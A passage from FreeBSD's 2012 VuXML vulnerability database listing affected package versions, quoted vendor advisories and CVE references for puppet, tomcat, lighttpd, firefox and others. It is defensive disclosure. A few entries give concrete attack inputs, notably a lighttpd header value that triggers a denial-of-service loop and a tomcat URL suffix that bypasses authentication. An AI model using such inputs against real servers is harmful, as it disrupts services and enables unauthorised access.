mirror of https://git.FreeBSD.org/ports.git synced 2024-12-20 04:02:27 +00:00
freebsd-ports/security/vuxml/vuln-2012.xml
Baptiste Daroussin e14ed8232d Rework vuxml a bit to make them validatable again
modify tidy.xsl to make it generate the xml declaration manually
xsl is not able to generate a list of entities otherwise.

Remove copyright from included files, they are redundant anyway and
in the end only the vuln.xml file is distributed with entities expanded

Rework a bit the entity declaration in order for the document to look
great after expansion (as it did before we introduced the expansion
mechanism)

All validations are now processed directly on the flattened file.

This is based on a patch from mfechner here

Submitted by:		mfechner
Differential Revision:	https://reviews.freebsd.org/D28299
2021-01-25 17:16:21 +00:00


<vuln vid="101f0aae-52d1-11e2-87fe-f4ce46b9ace8">
<topic>puppet -- multiple vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.6.*</gt><lt>2.6.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>puppet -- multiple vulnerabilities</p>
<blockquote cite="http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.6.17">
<p>Arbitrary file read on the puppet master from authenticated clients (high). It is possible to construct an HTTP get request from an authenticated client with a valid certificate that will return the contents of an arbitrary file on the Puppet master that the master has read-access to.</p>
<p>Arbitrary file delete/D.O.S on Puppet Master from authenticated clients (high). Given a Puppet master with the "Delete" directive allowed in auth.conf for an authenticated host, an attacker on that host can send a specially crafted Delete request that can cause an arbitrary file deletion on the Puppet master, potentially causing a denial of service attack. Note that this vulnerability does *not* exist in Puppet as configured by default.</p>
<p>Insufficient input validation for agent hostnames (low). An attacker could trick the administrator into signing an attacker's certificate rather than the intended one by constructing specially crafted certificate requests containing specific ANSI control sequences. It is possible to use the sequences to rewrite the order of text displayed to an administrator such that display of an invalid certificate and valid certificate are transposed. If the administrator signs the attacker's certificate, the attacker can then man-in-the-middle the agent.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3864</cvename>
<cvename>CVE-2012-3865</cvename>
<cvename>CVE-2012-3867</cvename>
<url>http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.6.17</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3864/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3865/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3867/</url>
</references>
<dates>
<discovery>2012-07-10</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="13320091-52a6-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-03/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. This is a variance of the XSS vulnerability, where an attacker could
send a specially prepared HTML email to OTRS which would cause JavaScript code
to be executed in your browser while displaying the email. In this case this is
achieved by using javascript source attributes with whitespaces.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4751</cvename>
<url>http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/</url>
<url>http://www.kb.cert.org/vuls/id/603276</url>
</references>
<dates>
<discovery>2012-10-16</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="95a69d1a-52a5-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability in Firefox and Opera</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-02/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. This is a variance of the XSS vulnerability, where an attacker could
send a specially prepared HTML email to OTRS which would cause JavaScript code
to be executed in your browser while displaying the email in Firefox and Opera.
In this case this is achieved with an invalid HTML structure with nested tags.
</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4600</cvename>
<url>http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-02/</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="49a6026a-52a3-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability in Internet Explorer</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-01/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. Due to the XSS vulnerability in Internet Explorer an attacker could send
a specially prepared HTML email to OTRS which would cause JavaScript code to be
executed in your Internet Explorer while displaying the email.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2582</cvename>
<url>http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-01/</url>
</references>
<dates>
<discovery>2012-08-22</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="c37de843-488e-11e2-a5c9-0019996bc1f7">
<topic>squid -- denial of service</topic>
<affects>
<package>
<name>squid</name>
<range><lt>2.7.9_4</lt></range>
<range><ge>3.1</ge><lt>3.1.23</lt></range>
<range><ge>3.2</ge><lt>3.2.6</lt></range>
<range><ge>3.3</ge><lt>3.3.0.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Squid developers report:</p>
<blockquote cite="http://www.squid-cache.org/Advisories/SQUID-2012_1.txt">
<p>Due to missing input validation Squid cachemgr.cgi tool
is vulnerable to a denial of service attack when processing
specially crafted requests.</p>
<p>This problem allows any client able to reach the
cachemgr.cgi to perform a denial of service attack on the
service host.</p>
<p>The nature of the attack may cause secondary effects
through resource consumption on the host server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5643</cvename>
<cvename>CVE-2013-0189</cvename>
<url>http://www.squid-cache.org/Advisories/SQUID-2012_1.txt</url>
</references>
<dates>
<discovery>2012-12-17</discovery>
<entry>2012-12-28</entry>
<modified>2013-05-02</modified>
</dates>
</vuln>
<vuln vid="85f33a8d-492f-11e2-aa75-003067c2616f">
<topic>opera -- execution of arbitrary code</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.12</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1038/">
<p>When loading GIF images into memory, Opera should allocate the
correct amount of memory to store that image. Specially crafted
image files can cause Opera to allocate the wrong amount of memory.
Subsequent data may then overwrite unrelated memory with
attacker-controlled data. This can lead to a crash, which may also
execute that data as code.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1038/</url>
<url>http://www.opera.com/support/kb/view/1039/</url>
</references>
<dates>
<discovery>2012-12-18</discovery>
<entry>2012-12-18</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="1657a3e6-4585-11e2-a396-10bf48230856">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.258</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-27.html">
<p>These updates address vulnerabilities that could cause a crash
and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5676</cvename>
<cvename>CVE-2012-5677</cvename>
<cvename>CVE-2012-5678</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-27.html</url>
</references>
<dates>
<discovery>2012-12-11</discovery>
<entry>2012-12-14</entry>
</dates>
</vuln>
<vuln vid="953911fe-51ef-11e2-8e34-0022156e8794">
<topic>tomcat -- bypass of CSRF prevention filter</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.31</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>The CSRF prevention filter could be bypassed if a request was made to a
protected resource without a session identifier present in the request.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4431</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="134acaa2-51ef-11e2-8e34-0022156e8794">
<topic>tomcat -- denial of service</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.27</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>When using the NIO connector with sendfile and HTTPS enabled, if a
client breaks the connection while reading the response an infinite loop
is entered leading to a denial of service.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4534</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="f599dfc4-3ec2-11e2-8ae1-001a8056d0b5">
<topic>tomcat -- bypass of security constraints</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.29</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>When using FORM authentication it was possible to bypass the security
constraint checks in the FORM authenticator by appending
"/j_security_check" to the end of the URL if some other component
(such as the Single-Sign-On valve) had called request.setUserPrincipal()
before the call to FormAuthenticator#authenticate().</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3546</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="2892a8e2-3d68-11e2-8e01-0800273fe665">
<topic>dns/bind9* -- servers using DNS64 can be crashed by a crafted query</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.2.1</lt></range>
</package>
<package>
<name>bind99-base</name>
<range><lt>9.9.2.1</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.4.1</lt></range>
</package>
<package>
<name>bind98-base</name>
<range><lt>9.8.4.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00828">
<p>BIND 9 nameservers using the DNS64 IPv6 transition mechanism are
vulnerable to a software defect that allows a crafted query to
crash the server with a REQUIRE assertion failure. Remote
exploitation of this defect can be achieved without extensive
effort, resulting in a denial-of-service (DoS) vector against
affected servers.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5688</cvename>
</references>
<dates>
<discovery>2012-11-27</discovery>
<entry>2012-12-04</entry>
</dates>
</vuln>
<vuln vid="f524d8e0-3d83-11e2-807a-080027ef73ec">
<topic>bogofilter -- heap corruption by invalid base64 input</topic>
<affects>
<package>
<name>bogofilter</name>
<range><lt>1.2.3</lt></range>
</package>
<package>
<name>bogofilter-sqlite</name>
<range><lt>1.2.3</lt></range>
</package>
<package>
<name>bogofilter-tc</name>
<range><lt>1.2.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Relson reports:</p>
<blockquote cite="https://bogofilter.svn.sourceforge.net/svnroot/bogofilter/trunk/bogofilter/NEWS">
<p>Fix a heap corruption in base64 decoder on invalid input.
Analysis and patch by Julius Plenz, [FU Berlin, Germany].</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5468</cvename>
<url>http://bogofilter.sourceforge.net/security/bogofilter-SA-2012-01</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-12-03</entry>
</dates>
</vuln>
<vuln vid="aa4f86af-3172-11e2-ad21-20cf30e32f6d">
<topic>YUI JavaScript library -- JavaScript injection exploits in Flash components</topic>
<affects>
<package>
<name>yahoo-ui</name>
<range><le>2.8.2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The YUI team reports:</p>
<blockquote cite="http://yuilibrary.com/support/20121030-vulnerability/">
<h1>Vulnerability in YUI 2.4.0 through YUI 2.9.0</h1>
<p>An XSS vulnerability has been discovered in some YUI 2 .swf files
from versions 2.4.0 through 2.9.0. This defect allows JavaScript
injection exploits to be created against domains that host affected
YUI .swf files.</p>
<p>If your site loads YUI 2 from a CDN (yui.yahooapis.com,
ajax.googleapis.com, etc.) and not from your own domain, you
are not affected. YUI 3 is not affected by this issue.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5881</cvename>
<cvename>CVE-2012-5882</cvename>
<url>http://yuilibrary.com/support/20121030-vulnerability/</url>
</references>
<dates>
<discovery>2012-10-30</discovery>
<entry>2012-11-27</entry>
<modified>2012-11-29</modified>
</dates>
</vuln>
<vuln vid="5536c8e4-36b3-11e2-a633-902b343deec9">
<topic>FreeBSD -- Linux compatibility layer input validation error</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_11</lt></range>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:08.linux.asc">
<p>A programming error in the handling of some Linux system calls
may result in memory locations being accessed without proper
validation.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:08.linux</freebsdsa>
<cvename>CVE-2012-4576</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="f115f693-36b2-11e2-a633-902b343deec9">
<topic>FreeBSD -- Insufficient message length validation for EAP-TLS messages</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:07.hostapd.asc">
<p>The internal authentication server of hostapd does not
sufficiently validate the message length field of EAP-TLS
messages.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:07.hostapd</freebsdsa>
<cvename>CVE-2012-4445</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="4b79538b-a450-11e2-9898-001060e06fd4">
<topic>FreeBSD -- Multiple Denial of Service vulnerabilities with named(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_11</lt></range>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:06.bind.asc">
<p>The BIND daemon would crash when a query is made on a resource
record with RDATA that exceeds 65535 bytes.</p>
<p>The BIND daemon would lock up when a query is made on specific
combinations of RDATA.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:06.bind</freebsdsa>
<cvename>CVE-2012-4244</cvename>
<cvename>CVE-2012-5166</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="0925716f-34e2-11e2-aa75-003067c2616f">
<topic>opera -- execution of arbitrary code</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1036/">
<p>When requesting pages using HTTP, Opera temporarily stores the
response in a buffer. In some cases, Opera may incorrectly allocate
too little space for a buffer, and may then store too much of the
response in that buffer. This causes a buffer overflow, which in
turn can lead to a memory corruption and crash. It is possible to
use this crash to execute the overflowing data as code, which may
be controlled by an attacking site.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1036/</url>
</references>
<dates>
<discovery>2012-11-19</discovery>
<entry>2012-11-22</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="1cd3ca42-33e6-11e2-a255-5404a67eef98">
<topic>lighttpd -- remote DoS in header parsing</topic>
<affects>
<package>
<name>lighttpd</name>
<range><gt>1.4.30</gt><lt>1.4.32</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Lighttpd security advisory reports:</p>
<blockquote cite="http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt">
<p>Certain Connection header values will trigger an endless loop, for example:
"Connection: TE,,Keep-Alive"</p>
<p>On receiving such value, lighttpd will enter an endless loop,
detecting an empty token but not incrementing the current string
position, and keep reading the ',' again and again.</p>
<p>This bug was introduced in 1.4.31, when we fixed an "invalid read"
bug (it would try to read the byte before the string if it started
with ',', although the value wasn't actually used).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5533</cvename>
</references>
<dates>
<discovery>2012-11-17</discovery>
<entry>2012-11-21</entry>
</dates>
</vuln>
<vuln vid="d23119df-335d-11e2-b64c-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>17.0,1</lt></range>
<range><lt>10.0.11,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.11,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.14</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.11</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.14</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>17.0</lt></range>
<range><lt>10.0.11</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-91 Miscellaneous memory safety hazards (rv:17.0/
rv:10.0.11)</p>
<p>MFSA 2012-92 Buffer overflow while rendering GIF images</p>
<p>MFSA 2012-93 evalInSanbox location context incorrectly applied</p>
<p>MFSA 2012-94 Crash when combining SVG text on path with CSS</p>
<p>MFSA 2012-95 Javascript: URLs run in privileged context on New Tab
page</p>
<p>MFSA 2012-96 Memory corruption in str_unescape</p>
<p>MFSA 2012-97 XMLHttpRequest inherits incorrect principal within
sandbox</p>
<p>MFSA 2012-98 Firefox installer DLL hijacking</p>
<p>MFSA 2012-99 XrayWrappers exposes chrome-only properties when not
in chrome compartment</p>
<p>MFSA 2012-100 Improper security filtering for cross-origin
wrappers</p>
<p>MFSA 2012-101 Improper character decoding in HZ-GB-2312 charset</p>
<p>MFSA 2012-102 Script entered into Developer Toolbar runs with
chrome privileges</p>
<p>MFSA 2012-103 Frames can shadow top.location</p>
<p>MFSA 2012-104 CSS and HTML injection through Style Inspector</p>
<p>MFSA 2012-105 Use-after-free and buffer overflow issues found</p>
<p>MFSA 2012-106 Use-after-free, buffer overflow, and memory
corruption issues found using Address Sanitizer</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4201</cvename>
<cvename>CVE-2012-4202</cvename>
<cvename>CVE-2012-4203</cvename>
<cvename>CVE-2012-4204</cvename>
<cvename>CVE-2012-4205</cvename>
<cvename>CVE-2012-4206</cvename>
<cvename>CVE-2012-4207</cvename>
<cvename>CVE-2012-4208</cvename>
<cvename>CVE-2012-4209</cvename>
<cvename>CVE-2012-4210</cvename>
<cvename>CVE-2012-4212</cvename>
<cvename>CVE-2012-4213</cvename>
<cvename>CVE-2012-4214</cvename>
<cvename>CVE-2012-4215</cvename>
<cvename>CVE-2012-4216</cvename>
<cvename>CVE-2012-4217</cvename>
<cvename>CVE-2012-4218</cvename>
<cvename>CVE-2012-5829</cvename>
<cvename>CVE-2012-5830</cvename>
<cvename>CVE-2012-5833</cvename>
<cvename>CVE-2012-5835</cvename>
<cvename>CVE-2012-5836</cvename>
<cvename>CVE-2012-5837</cvename>
<cvename>CVE-2012-5838</cvename>
<cvename>CVE-2012-5839</cvename>
<cvename>CVE-2012-5840</cvename>
<cvename>CVE-2012-5841</cvename>
<cvename>CVE-2012-5842</cvename>
<cvename>CVE-2012-5843</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-90.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-91.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-92.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-93.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-94.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-95.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-96.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-97.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-98.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-99.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-100.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-101.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-102.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-103.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-104.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-105.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-106.html</url>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
</references>
<dates>
<discovery>2012-11-20</discovery>
<entry>2012-11-20</entry>
</dates>
</vuln>
<vuln vid="81826d12-317a-11e2-9186-406186f3d89d">
<topic>weechat -- Arbitrary shell command execution via scripts</topic>
<affects>
<package>
<name>weechat</name>
<range><ge>0.3.0</ge><lt>0.3.9.2</lt></range>
</package>
<package>
<name>weechat-devel</name>
<range><lt>20121118</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sebastien Helleu reports:</p>
<blockquote cite="http://weechat.org/security/">
<p>Untrusted command for function hook_process could lead to
execution of commands, because of shell expansions.</p>
<p>Workaround with a non-patched version: remove/unload all scripts
calling function hook_process (for maximum safety).</p>
</blockquote>
</body>
</description>
<references>
<url>http://weechat.org/security/</url>
<url>https://savannah.nongnu.org/bugs/?37764</url>
</references>
<dates>
<discovery>2012-11-15</discovery>
<entry>2012-11-18</entry>
<modified>2012-11-18</modified>
</dates>
</vuln>
<vuln vid="2b841f88-2e8d-11e2-ad21-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.12</lt></range>
<range><ge>4.0.0</ge><lt>4.0.9</lt></range>
<range><ge>4.2.0</ge><lt>4.2.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.6.11/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Information Leak</h1>
<p>If the visibility of a custom field is controlled by a product
or a component of a product you cannot see, their names are
disclosed in the JavaScript code generated for this custom field
even though they should remain confidential.</p>
<p>Calling the User.get method with a 'groups' argument leaks the
existence of the groups depending on whether an error is thrown
or not. This method now also throws an error if the user calling
this method does not belong to these groups (independently of
whether the groups exist or not).</p>
<p>Trying to mark an attachment in a bug you cannot see as obsolete
discloses its description in the error message. The description
of the attachment is now removed from the error message.</p>
<h1>Cross-Site Scripting</h1>
<p>Due to incorrectly filtered field values in tabular reports,
it is possible to inject code leading to XSS.</p>
<p>A vulnerability in swfstore.swf from YUI2 allows JavaScript
injection exploits to be created against domains that host this
affected YUI .swf file.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4199</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=731178</url>
<cvename>CVE-2012-4198</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=781850</url>
<cvename>CVE-2012-4197</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=802204</url>
<cvename>CVE-2012-4189</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=790296</url>
<cvename>CVE-2012-5881</cvename>
<cvename>CVE-2012-5882</cvename>
<cvename>CVE-2012-5883</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=808845</url>
<url>http://yuilibrary.com/support/20121030-vulnerability/</url>
</references>
<dates>
<discovery>2012-11-13</discovery>
<entry>2012-11-14</entry>
<modified>2012-11-27</modified>
</dates>
</vuln>
<vuln vid="79818ef9-2d10-11e2-9160-00262d5ed8ee">
<topic>typo3 -- Multiple vulnerabilities in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5.0</ge><lt>4.5.21</lt></range>
<range><ge>4.6.0</ge><lt>4.6.14</lt></range>
<range><ge>4.7.0</ge><lt>4.7.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo Security Team reports:</p>
<blockquote cite="http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-005/">
<p>TYPO3 Backend History Module - Due to missing encoding of user
input, the history module is susceptible to SQL Injection and
Cross-Site Scripting. A valid backend login is required to exploit
this vulnerability. Credits go to Thomas Worm who discovered and
reported the issue.</p>
<p>TYPO3 Backend API - Failing to properly HTML-encode user input, the
tree render API (TCA-Tree) is susceptible to Cross-Site Scripting.
TYPO3 versions below 6.0 do not make use of this API, thus it is not
exploitable if no third party extension is installed which uses
this API. A valid backend login is required to exploit this
vulnerability. Credits go to Richard Brain who discovered and
reported the issue.</p>
</blockquote>
</body>
</description>
<references>
<url>http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-005/</url>
</references>
<dates>
<discovery>2012-11-08</discovery>
<entry>2012-11-12</entry>
</dates>
</vuln>
<vuln vid="a537b449-2b19-11e2-b339-90e6ba652cce">
<topic>DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust</topic>
<affects>
<package>
<name>opendkim</name>
<range><lt>2.7.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/268267">
<p>DomainKeys Identified Mail (DKIM) Verifiers may
inappropriately convey message trust when messages are
signed using test or small bit signing keys.</p>
</blockquote>
</body>
</description>
<references>
<certvu>268267</certvu>
</references>
<dates>
<discovery>2012-10-24</discovery>
<entry>2012-11-12</entry>
</dates>
</vuln>
<vuln vid="e02c572f-2af0-11e2-bb44-003067b2972c">
<topic>weechat -- Crash or freeze when decoding IRC colors in strings</topic>
<affects>
<package>
<name>weechat</name>
<range><ge>0.3.6</ge><lt>0.3.9.1</lt></range>
</package>
<package>
<name>weechat-devel</name>
<range><ge>20110614</ge><lt>20121110</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sebastien Helleu reports:</p>
<blockquote cite="https://savannah.nongnu.org/bugs/?37704">
<p>A buffer overflow is causing a crash or freeze of WeeChat when
decoding IRC colors in strings.</p>
<p>Workaround for a non-patched version:
/set irc.network.colors_receive off</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5854</cvename>
<freebsdpr>ports/173513</freebsdpr>
<url>http://weechat.org/security/</url>
<url>https://savannah.nongnu.org/bugs/?37704</url>
</references>
<dates>
<discovery>2012-11-09</discovery>
<entry>2012-11-10</entry>
<modified>2012-11-13</modified>
</dates>
</vuln>
<vuln vid="5e647ca3-2aea-11e2-b745-001fd0af1a4c">
<topic>ruby -- Hash-flooding DoS vulnerability for ruby 1.9</topic>
<affects>
<package>
<name>ruby</name>
<range><ge>1.9</ge><lt>1.9.3.327</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
